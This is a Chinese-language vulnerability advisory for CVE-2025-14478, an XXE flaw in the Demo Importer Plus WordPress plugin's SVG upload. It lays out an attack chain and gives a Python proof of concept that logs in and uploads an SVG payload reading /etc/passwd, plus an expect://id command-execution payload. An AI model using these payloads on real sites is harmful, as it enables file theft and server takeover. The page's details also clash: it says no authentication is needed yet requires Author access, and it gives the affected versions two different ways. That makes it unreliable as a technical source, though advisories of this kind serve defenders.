CVE-2025-14478 WordPress Demo Importer Plus插件XXE漏洞

漏洞信息

漏洞编号

CVE-2025-14478

漏洞类型

XXE (XML External Entity Injection)

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Demo Importer Plus WordPress Plugin

漏洞概述

Demo Importer Plus是WordPress平台上一款流行的演示内容导入插件，允许用户快速导入网站模板和演示数据。该插件在2.0.9及以下所有版本中存在严重的XML外部实体注入（XXE）漏洞，漏洞位于SVG文件上传功能模块中。攻击者利用此漏洞可以读取服务器上的任意文件，包括配置文件、源代码、凭证信息等敏感数据。在特定PHP版本（小于8.0）和服务器配置下，攻击者甚至可以实现远程代码执行，从而完全控制受影响的WordPress网站。此漏洞需要攻击者拥有Author级别或更高的WordPress用户权限，虽然需要认证，但Author级别的账户相对容易通过社会工程或其他方式获取。鉴于该插件的广泛使用和漏洞的严重性，建议所有使用该插件的用户立即采取修复措施。

技术细节

该漏洞源于Demo Importer Plus插件在处理SVG文件上传时未对XML内容进行充分的输入验证。SVG文件本质上是一种XML格式，攻击者可以在SVG中嵌入恶意DOCTYPE定义和ENTITY声明来触发XXE。漏洞核心代码位于inc/importers/class-demo-importer-plus-sites-helper.php文件的第88行附近。当插件解析上传的SVG文件时，会加载外部实体，攻击者可以通过file://协议读取服务器本地文件，或通过http://协议发起SSRF攻击。在PHP版本低于8.0的服务器上，配合expect://等包装器可实现命令执行。攻击者首先需要准备一个包含XXE payload的恶意SVG文件，通过插件的前台上传接口（如演示预览功能）上传该文件。上传后，插件会解析SVG内容并触发外部实体引用，从而读取目标文件内容或执行任意命令。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标WordPress网站并确认安装了Demo Importer Plus插件，版本在2.0.9或更低

STEP 2

步骤2: 获取访问权限

攻击者通过社会工程、密码喷洒或其他方式获取WordPress Author级别或更高权限的用户账户

STEP 3

步骤3: 准备恶意SVG文件

攻击者构造包含XXE payload的恶意SVG文件，使用DOCTYPE和ENTITY定义引用外部资源

STEP 4

步骤4: 上传恶意文件

通过插件的SVG上传功能上传恶意文件，触发服务器端XML解析

STEP 5

步骤5: 触发XXE读取文件

服务器解析SVG时加载外部实体，攻击者通过file://协议读取敏感文件如wp-config.php

STEP 6

步骤6: 权限提升/远程代码执行

在PHP<8.0环境下，可利用expect://等包装器实现命令执行，获得完全服务器控制权

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-14478 XXE PoC for Demo Importer Plus < 2.0.9
# Target: WordPress site with Demo Importer Plus plugin

TARGET_URL = "http://target-wordpress-site.com"
USERNAME = "attacker_account"
PASSWORD = "attacker_password"

def get_auth_token():
    """Get WordPress authentication nonce"""
    login_url = f"{TARGET_URL}/wp-login.php"
    session = requests.Session()
    
    login_data = {
        'log': USERNAME,
        'pwd': PASSWORD,
        'wp-submit': 'Log In',
        'redirect_to': '/wp-admin/',
        'testcookie': '1'
    }
    
    response = session.post(login_url, data=login_data)
    return session

def exploit_xxe(session):
    """Upload malicious SVG with XXE payload"""
    
    # XXE payload to read /etc/passwd
    xxe_payload = '''<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg><foo>&xxe;</foo></svg>'''
    
    upload_url = f"{TARGET_URL}/wp-admin/admin-ajax.php"
    
    files = {
        'file': ('malicious.svg', xxe_payload, 'image/svg+xml')
    }
    
    data = {
        'action': 'demo_importer_plus_upload_svg',
        'nonce': 'your_nonce_here'  # Need valid nonce from page source
    }
    
    response = session.post(upload_url, files=files, data=data)
    print(f"Response: {response.text}")

def exploit_rce(session):
    """RCE payload for PHP < 8.0 using expect wrapper"""
    
    rce_payload = '''<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "expect://id">
]>
<svg><foo>&xxe;</foo></svg>'''
    
    # Similar upload process as above
    pass

if __name__ == "__main__":
    print("CVE-2025-14478 Demo Importer Plus XXE Exploit")
    session = get_auth_token()
    exploit_xxe(session)

影响范围

Demo Importer Plus <= 2.0.9 (所有版本)

PHP < 8.0 (利用条件)

防御指南

临时缓解措施

立即限制Author级别用户的文件上传权限，临时禁用SVG上传功能，或将PHP版本升级到8.0及以上以降低RCE风险。同时在WAF上配置XXE防护规则拦截恶意XML请求。